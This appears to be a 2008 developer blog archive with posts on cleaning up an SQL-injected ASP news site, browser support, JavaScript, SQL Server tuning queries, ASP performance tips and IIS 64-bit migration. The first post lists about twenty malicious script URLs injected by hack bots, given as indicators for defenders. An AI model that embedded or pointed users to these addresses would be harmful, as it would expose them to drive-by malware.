Tuesday 23 September 2008

Latest SQL Injection URLS

Cleaning up a site infected with multiple SQL injected URLs

I have just had to clean up an ancient system that had been successfully hacked by automated hack bots. The site was a small news system that was visited rarely and written about 7 years ago. The code was ASP classic and the SQL was all client side and created using string concatenation with poor parameter sanitization and no thought paid at all to SQL injection methods. Luckily the site owner is moving to a new system this week however I still had to clean the database up and the main affected table contained at least 20 different script tags, some appearing over 5 times all referencing dodgy URIs. In fact by the looks of things the majority of the sites traffic over the last month was purely from hack bots which just goes to show that no matter how small a site is if it can be found on the web then a hackbot is going to try its luck. Luckily I managed to remove all traces of the hack using my clean up script and there was no need for a database backup restore.

However I thought it would be helpful to list out all the URI's injected into the system.
As you can see most are Russian with a few Chinese thrown in for good measure so nothing new there. They all caused Googles vulnerable site report to raise a flag and I believe the JS is the standard hack that makes use of the well known Iframe vulnerabilities in old browsers.

http://www0.douhunqn.cn/csrss/w.js
http://www.usaadp.com/ngg.js
http://www.bnsdrv.com/ngg.js
http://www.cdport.eu/ngg.js
http://www.movaddw.com/ngg.js
http://www.lodse.ru/ngg.js
http://www.sdkj.ru/ngg.js
http://www.kc43.ru/ngg.js
http://www.jex5.ru/ngg.js
http://www.bnrc.ru/ngg.js
http://www.bts5.ru/ngg.js
http://www.d5sg.ru/ngg.js
http://www.nemr.ru/ngg.js
http://www.kr92.ru/ngg.js
http://www.bjxt.ru/ngg.js
http://sdo.1000mg.cn/csrss/w.js
http://www.ujnc.ru/js.js
http://www.cnld.ru/js.js
http://www.juc8.ru/js.js
http://www.3njx.ru/js.js
http://www.19ssl.net/script.js
http://www.vtg43.ru/script.js

See my recovering from an SQL injection attack post for more details about clean ups and quick plasters that can be applied to prevent further injections.

Thursday 18 September 2008

What browser support do you offer your users.

Graceful degradation

In an ideal world you would want any website you develop to have the largest audience as possible. Sites these days can rely on multiple technologies to work (Javascript, Flash, Java, ActiveX, CSS) most of which the user can disable through choice even when their browser supports it. This means that when it comes to developing a site you have the decision between drawing a line in the sand and saying you must use this browser above this version and have JavaScript, Flash and ActiveX enabled for it to work which will mean a small and very annoyed audience. Or the better way which is to build the site from bottom up starting with a good HTML core structure that should work in all browsers and then add layers of functionality on top.

This means making sure all links have href tags that point to URIs and not Javascript: , images have alt tags, client side validation is duplicated on the server (which is good practise anyway to prevent hackers avoiding it by disabling javascript) and that the core navigation is not reliant on Javascript to work. This is called graceful degradation and ensures that your sites core functionality is available to as many users as possible.

For example if you were displaying flash banners you would start with an image that had alt tags defined so that if the user has a text based browser they read the content within the alt tags. If they have image support they would see the image but if they had Flash enabled they would view the movie.

The site I am currently working on divides browser support up into 3 levels and to help the user we include a browser compatibility page that lets the user see what level of support their browser settings are providing them along with links to let them download the latest version of their browser if they are using an old version. As well as showing the browser support level (see below) the page lists a number of key settings and features that the site makes use of with an indicator of whether this feature is enabled or not. Settings displayed include Flash, JavaScript, AJAX, Java, Cookies etc. Having one or more items on this feature list unavailable does not mean the site will not function only that certain parts of the site use this technology and therefore to get the richest experience from the site and enjoy all the functionality they should enable those missing features. Obviously there are some items that have to be available for the site to work such as forms and session cookies and we let the user know whether their browser and settings are compatible with the site by showing them crosses or ticks next to each item and an overall compatibility rating.

Browser support levels

The browser support grades are defined in the following way.

Leval 1 Support
This means that the site should be fully functional and display correctly. We will test the site fully in level 1 browsers to make sure any bugs are fixed as soon as possible. Currently our level 1 browsers are IE 7,6, Firefox 2 (3 still buggy), Safari 3, Opera 9.

Level 2 Support
This means browsers that should work without any problem with our software but as we cannot test every single available browser we cannot guarantee that everything will work. For example if the browser is the latest version of SeaMonkey or Firebird which is based on the same Gecko rendering engine that Firefox is (which is a level 1 browser) then the system should work perfectly depending on your browser settings. However as we do not fully test
the system with this browser we do not guarantee it will work 100%. Current level 2 browsers would be Firefox 3, Opera 8, Sea Monkey, Konqueror.

Level 3 Support
This means older or niche browsers such as PDA/Mobile phones that we do not test the system on. This is not to say the system won't work as it might do depending on your browser settings. However we are not going to test our system on Netscape Navigator 4 or every mobile phone to ensure it works.

A fully functional site means no Javascript errors however the Javascript is not really a problem as most code that works in IE 7 is going to work in IE 5 and we all try to write cross browser code nowadays which is made easier with all the libraries available. The issue is more to do with CSS and all the quirks between IE/Mozilla and the various versions. IE 6 for instance has a number of major differences which means special stylesheets or hacks have to be implemented. As much as we would like to downgrade IE 6 to a level 2 browser we cannot due to the simple fact that a number of our largest clients still use IE 6 as their browser. We have enquired about the possibility of them upgrading but were actually told that their technical support team would not allow them to which is understandable if you consider how much support time would be taken up by requests of help because of the new browser layout. I can imagine don't want to suffer the hundreds of phone calls asking "where has the history menu disapeared to."

I also have Firefox 3 in level 2 due to the fact that there are still a number of outstanding issues with the site which need resolving before we would make it level 1. Some of these issues are definitely a problem with the browser such as the well known problem of playing Flash videos which an upgrade to version 10 is the only workaround I have found. There is also an issue with the execCommand function which I am not sure about as the code worked fine in Firefox 2 and other browsers but has suddenly started giving me Component returned failure code: 0x80004003 (NS_ERROR_INVALID_POINTER) [nsIDOMNSHTMLDocument.execCommand]" errors in an iframe based wysiwyg editor the site uses.

Current browser usage

I like to occasionally look at the traffic statistics to see whether our grading of browsers over 3 levels is in keeping with actual Internet use.

The system I am logging against is recording on average 350,000 page loads a day at the moment roughly 50-60% of which are from crawlers which is nothing out of the ordinary. So looking at the traffic from those site members who have logged into the website as opposed to just visitors the browser breakdown for this month so far is:

Browser %
IE 7.0 61.56
IE 6.0 27.21
Firefox 3.0 5.44
Firefox 2.0 3.06
Safari 3.1 2.72

Which is no great surprise and shows how much of a market share IE 6 still has even after 2 years of IE 7 being around.

As for obscure and old browser versions would you be surprised or not to know that for today only the following browsers appeared in the stats for all non-crawler traffic:

  • 62 different people used IE 5.0 and 1 came along in IE 4!
  • 5 visited on various versions of Netscape Navigator 4.
  • Overall users to the site Yandex the Russian search engine came third after IE 7 and 6.
  • There were over 100 different types of browser/version recorded today alone.

Although not earth shatteringly exciting it does show the breadth of browser types available and also that a large majority of the users out there do not seem upgrade very often, some not at all by the looks of things. With new versions of browsers rolling out all the time it would be physically impossible to test a site in each one but if your site works in the major 4 rendering engines (IE/trident, Firefox/Gecko, Safari/Webkit, Opera/Presto) then you will be covering the majority of those users who do keep up to date with browser revisions.

Sunday 14 September 2008

My growing love for Javascript

A shaky start to the love affair

I have no shame in admitting that I am currently in love with JavaScript. It may be that for the last eon or two I have been working with clunky old scripting languages such as ASP classic and whenever I get a chance to do some JavaScript I grab it with open arms as an opportunity to do what seems like proper programming. I will be the first to admit that I never used to see JavaScript in the way I do now and as well as never understanding its full potential I never even thought of it as a proper object orientated language which it most certainly is. When I first swapped over from client / server applications in the early 90's to web development using ASP/COM/SQL Server 6 JavaScript was just a nice little scripting language that could set the focus of inputs, validate input client side and other little tweaks that didn't seem of much importance in the grand scheme of things. The "proper" coding was done server side and I would have traded my ciggies by the dozen with anyone to work on a stored procedure or COM component than have to fiddle round with a scripting language that I had little time or patience for.

Coming from a VB background I hated the problems of case sensitivity and having to remember that equality tests involved more than one equals sign, sometimes even three. Trying to debug a script was always a nightmare having to sit there clicking away all those alert boxes before realising you were in some sort of never ending loop and having to kill the browser and start again. Yes I really didn't think much of it and I am certainly not alone in feeling like that.


The love that grew from necessity.

So over the years my views on JavaScript changed from hatred to a mild respect still outweighed by all the annoyances that come with trying to write a fully functional script that is complex and cross browser at the same time. I still didn't have to work with it that much apart from replicating any server side form validation on the client and some mild DOM manipulation. My annoyance with the language itself had disappeared after I had learnt Java and C# and the scripts that I did have to knock out were not that complex however I still had an attitude that if it worked in the browser that I was using which was always the latest version of Internet Explorer then the script was fine by me. If it didn't work in Netscape or Safari then I would just ask the office "Javascript Guru" to have a look and the code I was given usually seemed to work even if I didn't know what it was doing. Then the other year I wanted to implement a WYSIWYG editor for the system I was working on. The system was currently using the FCKEditor and I wanted to implement what seemed like a simple request at the time a character counter so that as the user typed the number of characters used in the HTML source was available for viewing. I remember trying to edit the FCK source and realising what a huge beast it was. The size of its directory was ten times the size of the rest of the site. I was sure that half the code and possible functionality was not required for my systems requirements. I had a look at some other widgets including OpenWYSIWYG and another one that our Javascript guru had used and then I decided to write my own combining the best bits of each, stripping out anything not needed, adding my bullet counter and making it as flexible as possible. It seemed like a straight forward task on paper but it was the start of a painstaking development but more importantly it was the start of a long learning process which although extremely painful at the time opened my eyes to the wonders of cross browser coding and all the different caveats and pitfalls that were waiting for me to discover.


Items of interest discovered along the way.

Whilst developing this widget some of the most seemingly simple things turned out to be some of the most complex. Who would have thought just putting a cursor at the end of any content in the IFrame editor would be such a tall order. So as well as learning far too much about browser differences and the history of Netscape and Mozilla and why User-Agents seem to make little sense I found out some very important information and came across some specific problems that everyone comes across at some stage when developing cross browser script.

1. How Firefox is indeed a wonderful invention with all those extensions especially Firebug which made my debugging life pain free once again. Not only that but Firebug lite brings most of that joy to debugging in IE. No more tired fingers from closing alert buttons.

2. The problems with relative URIs displayed within Iframes in Internet Explorer. Read this article for an explanation. The solution was to write out the Iframe content with document.write.

3. Different implementations of content editable HTML between browsers. Issues setting design mode on in Mozilla and disappearing event listeners. All good fun for the clueless I can assure you.

4. All the fun involved in learning about the event model and the problem of "this" keyword in IE as well as the memory leakage in older IE versions and the illogical ordering IE fires events in.

5. Differences between browsers when trying to calculate the size of the viewport and window dimensions for making my editor appear in a floating div.

6. Trying to make the content outputted by the editor as consistent as possible across browsers and XHTML compliant. IE seems to love capital letters and forgetting to close LI and DT elements for some reason.

7. Much much more.

So as you can see if you have yourself covered all those topics in detail, which means you will most certainly have read Dead Edwards competition blog article from start to finish as well as follow most of the links it leads to, this is a lot of information to take in and understand. However rather than put me off JavaScript for life its actually made me come to love the bloody thing.


Conclusion

So whereas in the 90's I used to hate all those cross browser problems they are more of a challenge to be overcome now and I love it when I get a complicated piece of code working in the main 4 browsers as well as many old versions as possible. In fact I may get a little too keen sometimes and often need my colleagues to tell me that the widget doesn't actually need to work in Netscape Navigator 4 or IE 4.

I am one of those people who will readily admit that I don't know everything but I like finding out about those missing chunks of knowledge and when given the choice of an easy life by implementing someone else's code as is will now often choose the more painful but also more enjoyable option of trying to write my own version. I will have a look at some of the best examples out on the web and try to put them all together which is usually the best way of learning about all those little nice little cross browser intricacies on the way.

As the saying goes nothing worthwhile in life comes easily and this seems to be particularly true with writing cross browser JavaScript code.

Tuesday 9 September 2008

SQL Performance Tuning Queries

SQL 2005 Performance Tuning Queries

Here are some of my favourite queries that help with SQL performance tuning.
I have gathered most of these from the web and 3rd party sources over the years with the odd tweak here and there if needed and they form the bulk of my performance tuning toolkit. You should have a file containing a number of similar queries always close at hand as they are invaluable in hunting down problematic queries or even SQL injections or DOS attacks.

Update: 07-Dec-08
In response to the comment about filtering by db_id() I have removed that filter from a few of the examples as he is correct in stating that filtering by db_id() will not return all the possible data and will miss out queries run from the client or from within stored procs that use dynamic sql. Also if you are in a hurry and want to skip to a very useful procedure that will output nearly 20 different performance related reports for one or more databases then go straight to this download of mine: Download SQL 2005 Performance Reports. 


Top 50 worst queries for I/O

There are 2 different kinds of I/Os that are tracked within SQL Server: Logical and Physical IOs. Logical I/O account for data that is processed from the buffer pool which resides in memory, hence the phrase Logical I/O. Physical I/Os are I/Os that are associated with accessing data directly from the physical disks that SQL Server uses to store databases. Physical I/O’s are more expensive I/O’s, meaning they take longer to process. I/O is general the single most expensive operation that impacts the overall performance of a TSQL statement. So when you are tuning your queries you want to minimize the number of logical and physical I/O’s operation performed to produce a result set.

If you query shows physical I/O on the first run but none on the second its due to SQL holding the data in memory so you need to clear your buffer cache using DBCC DROPCLEANBUFFER

SELECT TOP 50
(qs.total_logical_reads + qs.total_logical_writes) /qs.execution_count as [Avg IO],
substring (qt.text,qs.statement_start_offset/2,
(case when qs.statement_end_offset = -1
then len(convert(nvarchar(max), qt.text)) * 2
else qs.statement_end_offset end - qs.statement_start_offset)/2)
as query_text,
qt.dbid,
qt.objectid
FROM sys.dm_exec_query_stats qs
CROSS APPLY sys.dm_exec_sql_text (qs.sql_handle) as qt
ORDER BY [Avg IO] DESC


Top 50 worst queries by average running time

The following query will list the worst performing queries based on their average elapsed running time. It will give you the times, logical & physical reads and the TSQL of the statement in question.

SELECT TOP 50
creation_time,last_execution_time,total_physical_reads
,total_logical_reads,total_logical_writes, execution_count
,total_worker_time, total_elapsed_time, total_elapsed_time / execution_count
avg_elapsed_time, SUBSTRING(st.text, (qs.statement_start_offset/2) + 1,
((CASE statement_end_offset WHEN -1 THEN DATALENGTH(st.text) ELSE
qs.statement_end_offset END - qs.statement_start_offset)/2) + 1) AS statement_text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) st
ORDER BY total_elapsed_time / execution_count DESC;


This query is similar to the previous one in the DMVs (dynamic management views) it uses but it provides the most CPU intensive queries in a system. If you are seeing high CPU spikes or top end flatlining on your DB server then this query will help find out whether you are being attacked with SQL Denial of Service attacks or whether you have some queries that are using pattern matching techniques (LIKE, PATINDEX, CLR Regular Expressions) that have been given a complex string to search for that has caused the server to max out on CPU.

SELECT TOP 50 (a.total_worker_time/a.execution_count) AS [Avg_CPU_Time],
Convert(Varchar,Last_Execution_Time) AS 'Last_execution_Time',
Total_Physical_Reads,
SUBSTRING(b.text,a.statement_start_offset/2,
(case when a.statement_end_offset = -1 then len(convert(nvarchar(max), b.text)) * 2
else
a.statement_end_offset end - a.statement_start_offset)/2) AS Query_Text,
db_name(b.dbid)as DatabaseName,
b.objectid AS 'Object_ID'
FROM sys.dm_exec_query_stats a
CROSS APPLY sys.dm_exec_sql_text(a.sql_handle) AS b
ORDER BY [Avg_CPU_Time] DESC


Suggested index columns and usage

SELECT d.*
,s.avg_total_user_cost
,s.avg_user_impact
,s.last_user_seek
,s.unique_compiles
FROM sys.dm_db_missing_index_group_stats s
,sys.dm_db_missing_index_groups g
,sys.dm_db_missing_index_details d
WHERE s.group_handle = g.index_group_handle
AND d.index_handle = g.index_handle
AND database_id = db_id()
ORDER BY s.avg_user_impact DESC
View index usage by table.

Ideally you want high figures in the user_seeks column.
If you have no seeks and lots of lookups then you should investigate. Also if you have indexes with no seeks, scans or lookups then they should be dropped as the index is not being used.

SELECT i.Name, i.Type_Desc, i.Is_unique, d.*
FROM sys.dm_db_index_usage_stats as d
JOIN sys.indexes as i
ON i.object_id = d.Object_id and
i.index_id = d.Index_id
WHERE database_id=db_id()
AND d.object_Id=object_id('JOBS')
View the fragmentation levels of your In Row (non blob/text) indexes


SELECT object_name(d.object_id), d.object_id, d.index_id, i.name as IndexName,
avg_fragmentation_in_percent, alloc_unit_type_desc
FROM sys.dm_db_index_physical_stats (db_id(), NULL, NULL, NULL, NULL) as d
JOIN sys.indexes as i
ON i.object_id = d.object_id and
d.index_id = i.index_id
WHERE d.Index_Type_Desc <> 'HEAP' AND
i.Name is not null AND
avg_fragmentation_in_percent>= 30 --change this figure to reflect your own requirements
ORDER BY object_name(d.object_id)


Finds the degree of selectivity for a specific column in a row

The higher the percentage the more selective it is and an index should be considered. There is no point having indexes on columns that have low selectivity as it would not help differentiate between rows when 50% of rows are one value and 50% another. This is the reason why its not a good idea to place indexes on bit columns as there are only two possible values. The only exception to this would be when you have a very high percentage that have one value (99% true) and you want to find the 1% that have the opposite value (false) however even then I would advise against it.


Declare @total_unique float
Declare @total_rows float
Declare @selectivity_ratio float

SELECT @total_unique = 0
SELECT @total_rows = 0
SELECT @selectivity_ratio = 0

/*
Finds the Total Number of Unique Rows in a Table
Be sure to replace OrderID below with the name of your column
Be sure to replace [Order Details] below with your table name
*/
SELECT @total_unique = (SELECT COUNT(DISTINCT ClientFK) FROM JOBS)

/*
Calculates Total Number of Rows in Table
Be sure to replace [Order Details] below with your table name
*/
SELECT @total_rows = (SELECT COUNT(*) FROM JOBS)

--Calculates Selectivity Ratio for a Specific Column
SELECT @selectivity_ratio = ROUND((SELECT @total_unique/@total_rows),2,2)
SELECT @selectivity_ratio as 'Selectivity Ratio'



So those are a few of my favourite queries that I use very frequently to help hunt down and resolve back end performance bottlenecks. Since SQL 2005 came out with all these really cool DMVs a lot of people have spent time putting these sorts of queries together into one report.

If you want to get your hands on one of these all encompassing queries then check out the following stored procedure which uses a query I came across and extended to make it more customisable:


Its a beast of a report but gives you everything you need to know in one report. Read the comments before each section carefully so you understand what the data is showing you. Also if you run the report as it is on a server with lots of databases, tables, indexes etc it will take some considerable time to execute so I suggest using one of the modes that enables you to filter only on those databases you require statistics for.  So call it like so:

EXEC dbo.usp_sql_rpt_database_performance_stats 3, 'strictlysoftware%'

will only report on databases on that server that have a name (sys.databases) that start with strictlysoftware. You will most likely also want to exclude the system tables (master, msdb, model) although you may want to report on tempdb so call it like so:

EXEC dbo.usp_sql_rpt_database_performance_stats 1, NULL

Another script that contains some useful code related to blocking and wait times can be found at Microsoft's site. The code is near the bottom of the page.



So there you go a one stop shop of goodies that should help you on your way. Please let me know if you have other useful DMV related queries or anything specific to SQL 2008 that is coming our way soon.

SQL Performance Top Tips

Another SQL Performance Top Tips?

I know there are lots of Top Tips for improving SQL performance out there on the web but you can never have too much of a good thing so I have created my own list of issues to identify and resolve when trying to improve the performance of an SQL database.


1. Investigate and resolve dead locks or blocked processes.


All it takes is one blocked process on a commonly hit table for your whole site to hang and start reporting timeout issues.

On my jobboard sites I had locking issues with my main JOBS table that had to be joined to a number of other tables to get the data needed on results pages that were hit constantly by crawlers. These tables were also being updated constantly by clients and automated feeds from multi-posters which meant that locks were likely.

As I use one database for multiple sites it also meant that a lock caused by one site would cause timeout issues for the other sites.

To resolve this I created some de-normalised flat tables per site that contain all the fields needed for reporting and searching which meant:

  • The JOB table is only updated at regular intervals and not instantly. SQL 2005 introduced the synonym feature which I demonstrate here. This is used to swap between tables being built and tables in use by the site so that a new table can be built behind the scenes with up to date data.
  • Clustered indexes can be site specific depending on the columns the site search on the most.
  • No joins needed when accessing the table and results are returned very fast.
  • Any problems accessing this table do not affect other sites.
Another trick to handle instances where you are selecting from tables that maybe updated constantly such as job or banner hit tables is to look at the following:
  1. If the table you are selecting from is never updated or deleted from during the times you are selecting from then you can use the WITH (NOLOCK) statement on your SQL SELECTS. You won't have to worry about dirty reads as you are not actually updating the data and you bypass all the overhead SQL has to go through to maintain the LOCKING.
  2. Use the LOCK_TIMEOUT statement to reduce the time LOCKS are held for.
  3. Use the TRY / CATCH statement to catch deadlocks and other blocking errors in combination with a retry loop. After X retries return from the proc. View my example of using LOCK_TIMEOUT to handle DEADLOCKS and BLOCKING.



2. Look into large batch processes that have long run times, take up I/O, have long wait times or cause blocking.

A good example is where you have to transfer lots of records from one table to another e.g from a daily table that only receives INSERTS (e.g job / banner hits) into a historical table for reporting.

If you are deleting large numbers of records from a table that is also being used then you don't want to cause blocks that will freeze your site. In conjunction with point 1 you should look into how you handle your DELETE / UPDATE statements so that they are done in small BATCHES using the SQL 2005+ TOP command.

Read this article for an example of updating or deleting in batches to prevent blocking.

To find out problematic queries after the fact you can utilise the SQL 2005+ Data Management Views (DMV's) which hold key information about the system.

Read this article on my top queries for performance tuning to help identify those queries that need tuning.


3. Re-Index and De-Frag tables

Make sure you regularly re-index and de-fragment your tables as over time fragmentation will build up and performance will be affected. I tend to set up a weekly MS Agent job that runs a Defrag / Re-organize or  on tables with fragmentation over a set percentage as well as rebuild index statistics.

I then also try to schedule a full re-index of all my main tables once a quarter at scheduled down times as during a full rebuild the tables can be taken off line depending on your SQL setup.


4. Identify Slow Queries

Investigate your slowest running queries to make sure they are covered adequately by indexes but also try not to over use indexes. Try to cover as many queries with as few indexes as possible.

Try running this SQL performance report which will identify a dozen or so areas which could be improved on your system including:


  • Causes of the server waits
  • Databases using the most IO
  • Count of missing indexes, by database
  • Most important missing indexes
  • Unused Indexes
  • Most costly indexes (high maintenance)
  • Most used indexes
  • Most fragmented indexes
  • Most costly queries, by average IO
  • Most costly queries, by average CPU
  • Most costly CLR queries, by average CLR time
  • Most executed queries
  • Queries suffering most from blocking
  • Queries with the lowest plan reuse

This is an invaluable tool for any SQL DBA or SQL performance tuning developer.



5. Split tables

If your tables are used for inserting/updating as well as selection then for each index you have on a table that's an extra update required when a record is saved. On some of my big tables that are used heavily for reporting I split the data into daily and historical data. The daily table will allow updates but the historical table will not.

At night a job will transfer the daily data into the historical table, dropping all current indexes, populating the new data and then rebuilding the indexes with a 100% fill factor. You need to balance out whether speed on data retrieval or on update is more important if the table is used for both. You should also look into points 1 and 2 about managing blocking and batch updates/deletes to handle instances where a table is being deleted whilst accessed at the same time.


6. Re-write complex queries and make WHERE clauses SARGABLE

Can you rewrite complex queries to be more efficient. Can you remove left joins to large tables
by populating temporary tables first. Are you putting functions in the WHERE, HAVING clause on the column and negating any index usage. If so can you rewrite the clause and make it SARGABLE so that you make use of the index. For example a WHERE clause like so

WHERE DateDiff(day,CreateDate,GetDate()) = 0

Which is filtering by todays date should be rewritten to:


WHERE CreateDate > '2008-sep-09 00:00:00' --where this is the previous midnight

Put the value from GetDate() into a variable before the SELECT and then use that in the filter
so that no function is used and any index on CreateDate will be available.

Read this article of mine which proves the benefits of SARGABLE clauses in SQL.


7. Query Plan Caching

Check that you are benefiting from query plan caching. If you are using stored procedures that contain branching through use of IF statements that run different SQL depending on the values passed in by parameters then the cached query plan for this procedure may not be the best for all parameter variations.

You can either rewrite the procedure so that each IF branch calls another stored procedure that contains the query required as it will be this plan that gets used.

Or you could rewrite the query to use dynamic SQL so that you build up a string containing the appropriate syntax and parameters and then execute it using sp_executesql which will take advantage of plan re-use. Do not use EXEC as this will not take advantage of plan re-use and its not as safe in terms of sql injection.

You should also look into whether your query plans are not getting used due to your SQL Server settings as the default mode is to use SIMPLE PARAMETERIZATION and not FORCED PARAMETERIZATION.

This features takes AdHoc queries containing literal values and removes values replacing them with parameters. This means that the query plan which gets cached can be re-used for similar queries that have different values which can aid performance as it will reduce compilation time.

When the system is set to SIMPLE mode only AdHoc query plans that contain the same literal values get cached and re-used which in many cases is not good enough as the values for most queries will change all the time for example in SIMPLE mode only the plan for the exact query below will be cached.


SELECT *
FROM PRODUCTS
WHERE ProductID = 10

Which means only products with the ProductID of 10 will benefit from a cached plan however with FORCED PARAMETERIZATION enabled you would have plan with parameters so that any ProductID can benefit from it e.g


SELECT *
FROM PRODUCTS
WHERE ProductID = @1 -- name of SQL parameter


For a more detailed look at the benefits of this method read my article on forced paramaterization.


8. Use the appropriate table for the situation

SQL has a variety of tables from fixed permanent tables to global and local temporary tables to table variables that are both stored in tempdb.

I have found a number of times now that the use of table variables start off being used in stored procedures as very useful memory efficient storage mechanisms but once the datasets stored within them rises above some threshold (I have not found the exact threshold amount yet) the performance drops incredibly.

Whilst useful for array like behaviour within procs and quick for small datasets they should not be used with record sets of many thousands or millions of records. The reason being that no indexes can be added to them and any joins or lookups will result in table scans which are fine with 10-100 records but with 20 million will cause huge problems.

Swapping table variables for either fixed tables or temporary tables with indexes should be considered when the size of data is too great for a table variable.

If your procedures are being called by website logins with execute permission you will need to impersonate a login with higher privileges to allow for the DDL statements CREATE and DROP as a basic website login should have nothing more than read privileges to prevent SQL injection attacks.

If you don't want to risk the rise in privileges then consider using a fixed table and the use of a stamp and unique key so that multiple calls don't clash with each other. Appropriate indexes should be used to ensure speedy data retrieval from these tables.

A real world example I have found is explained in this article on speeding up batch processes that use table variables.


9. Tuning for MySQL

MS SQL has a vast array of useful tools to help you performance tune it from it's Data Management Views and Activity Monitor to it's detailed Query Execution Plans. However if you are using MySQL and have to suffer using a tool like NAVICAT then you are not in such a good position to tune your queries.

The EXPLAIN option is nowhere near as useful as the MS SQL Query Execution Plan but it can be used to ensure the appropriate indexes are added if missing and the Slow Query Log is a useful place to identify problematic queries.

If you are using LINUX or Wordpress and running your system on MySQL then read this article of mine on performance tuning for MySQL.


These are just some tips to look at when trying to improve back end database performance and I will add to this list when I get some more time. Feel free to post your own tips for identifying problematic SQL and then fixing it.

Monday 8 September 2008

Top 10 Tips for improving ASP performance

Top 10 Tips For Speeding up ASP Classic Sites

1. Look for nested loops and replace them with SQL stored procs. Its surprising how many times I have looked at sites that when outputting product hierarchies or menus on those old catalogue sites use nested loops to build up the content. Its usually people who got into programming on the web side with little or no SQL knowledge that was then learnt later only as and when they required somewhere to persist the data. Replace nested loops with SQL Stacks (see BOL) or in 2005 a recursive CTE. From tests I have found the Stack to perform slightly faster than the CTE but both will outperform nested loops. The data will most likely be in an adjacency table anyway so its just the method of outputting it. I remember replacing one such beast of nested loops with a stored procedure stack and it increased performance by a factor of 20.

2. Re-use those objects. Do you have helper functions that carry out regular expressions or file system object actions that instantiate the object within the function. If you call these functions
more than once on a page you are creating an unneccesary overhead. Have a global include file where you declare some often used variables. Then the first time you call the function if it doesn't exist initialise it otherwise use the existing object pointer. Then destroy them all in your global footer.

3. Simplify any complex regular expressions by breaking them down into multiple parts. I have had problems with badly written regular expressions causing CPU on our webserver to max at 100%. On our quad it would jump to 25%, four hits at the same time and 100% and then no other pages would load. Also complex expressions that do lots of lookbacks will cause overhead and the longer the string you are testing against the more overhead you will get. Remember VBs Regular Expression engine is not as good as some others so its better to break those long complex expressions up into smaller tests if possible.

4. String concatenation. In ASP.NET you have the string builder class but in ASP classic you should create your own using Arrays to store the string and then do a JOIN at the end to return it. Doing something like the following

For x = 1 to 100
strNew = strNew & strOtherString
Next
May work okay if the size of the string in strOtherString is small and you have few iterations but
once those strings get larger the amount of memory used to copy the existing string and then add it to the new one will grow exponentially.

5. Try to redim arrays as few times as possible especially if you are doing a Preserve. Its always best to dim to the exact size before hand but if you don't know how big your array will be then
dim it to a large number first and then use a counter to hold how many elements you actually add. Then at the end you redim preserve once back down to the number of elements you actually used. This uses a lot less memory than having to redim preserve on each addition to the array.

6. Use stored procedures for complex SQL and try to reduce database calls by calling multiple SQL together and then using NextRecordset() to move to the next set of records when you need to. Using stored procedures will also reduce network traffic as its much easier to connect to the DB once and pass through the names of 3 stored procedures than connect 3 times passing through the X lines of SELECT statements that each recordset requires.
strSQL = "EXEC dbo.usp_asp_get_records1; usp_asp_get_recorddetails; usp_asp_get_country_list;"

Set objRS = objConnection.Execute(strSQL)

If not(objRS.BOF AND objRS.EOF) Then
arrRecords = objRS.GetRows()
Set objRS = objRS.NextRecordset()
End If
If not(objRS.BOF AND objRS.EOF) Then
arrRecordDetails = objRS.GetRows()
Set objRS = objRS.NextRecordset()
End If
If not(objRS.BOF AND objRS.EOF) Then
arrCountryList = objRS.GetRows()
End If
7. Make sure that you don't put multiple conditions in IF statements. ASP doesn't support short circuiting which means it evaluates every condition in an IF statement even if the first one
is false. So rewrite code such as:

If intCount = 1 AND strName = "CBE" AND strDataType = "R" Then
'Do something
End If

If intCount = 1 Then
If strName = "CBE" Then
If strDataType = "R" Then
'Do something
End If
End If
End If
8. Also make sure you evalutate conditions in the correct order if you are checking a value for True and False then you don't waste an extra check when you can just change the order of the conditions.

If Not(bVal) Then
Response.Write("NO")
Else
Respone.Write("YES")
End If
Should obviously be

If (bVal) Then
Response.Write("YES")
Else
Respone.Write("NO")
End If
8. Cache as much data as possible if it doesn't change frequently. If you have lists that come from a database but never change or very infrequently change then you could either store them in memory and reload every so often or write the array to a file and then use that static array and only re-create the file when the data changes. I always add an admin only function into my sites that on the press of a button will reload everything I need to into files and cache. This prevents un-required database lookups.

9. Pages that contain database content that's added through the website that only changes when the user saves that content can be created to static HTML files if possible. Rather than rebuilding the page from the DB each time someone views it you can use the static version. Only rebuild the page when the user updates the content. For example a lot of CMS systems store the content within the DB but create a static version of the page for quick loading.

10. Encode and format content on the way into the database not each time its outputted to be displayed. Its more cost efficent to do something once on the way in that hundreds of times on the way out.

These are just a few of the things I have found out that can be very beneficial in speeding up a classic ASP site on the web side of things. As well as any performance tweaks that can be done application side you should take a look at the database to make sure thats performing as well as possible. If your site is data driven then a lot of the performance will be related to how quick you can build those recordsets up and deliver them to the client.

Migrating IIS web application from 32 bit to 64 bit server.

Changing Servers from a 32 to 64 bit environment

By Strictly-Software

I recently had to go through the process of moving a website from a 32 bit windows to 64 bit windows server.

It was one of those tasks that I presumed would be pretty simple and not involve much work but turned into a proper nightmare.

I thought there might have been some sort of “gotcha” guide out on the web somewhere but if there was at the time I couldn’t find it!

I could either find bits and bobs about some individual problems or nothing at all. So I promised myself that on completion I would create an article myself detailing all of the major problems I had to overcome and the solutions I used. So here it is!

The original system was a Windows 2003 server hosting IIS 6.0 and running ASP classic sites.

We had got to the limits in terms of memory allocation and had boosted performance as much as we could in the application (see top 10 tips for boosting ASP classic site performance) therefore we wanted to try moving to a new 64 bit server before considering any large scale application rewrite to .NET.

1. COM objects and compiled dll libraries.

We found that most of our 3rd party COM objects needed upgrading to 64 bit.

You should check each object in turn to see if you need new installations or licences. Objects that we used that needed upgrading included:
  • ASPEmail
  • ASPJPEG
  • ASPUpload
  • DTSearchEngine
  • ISAPI_Rewrite

2. Running scripts.

Scheduled jobs (.bat, .cmd, .vbs) all need to be able to run in a 64 bit environment.

A 64 bit script cannot run a 32 bit process so if your script tries to instantiate 32 bit COM objects
you will get errors unless you upgrade those COM objects to 64 bit (see above).

Another option is to run the script in the c:\windows\sysWOW64\ directory with
cscript which enables you to run 32 bit scripts in a 64 bit environment.

3. ISAPI Rewrite

The name of the rewrite configuration file changes from httpd.ini to .htaccess and if you compare
the format of the files they differ in syntax e.g the flag [I] for "Ignore Case" becomes [NC] "No Case" and a 301 permanent redirect flag of [RP] becomes [R=301].

Also for Rewrite Rules the 64 bit version which is similar to that used on Apache servers requires the first rule to be wrapped in starting and closing tags e.g

# 32 BIT RULE

RewriteRule /some-old-page.htm http://www.newsite.com/newpage.htm [I,O,RP,L]

Becomes

#64 BIT RULE

RewriteRule ^/some-old-page.htm$ http://www.newsite.com/newpage.htm [NC,R=301,L]


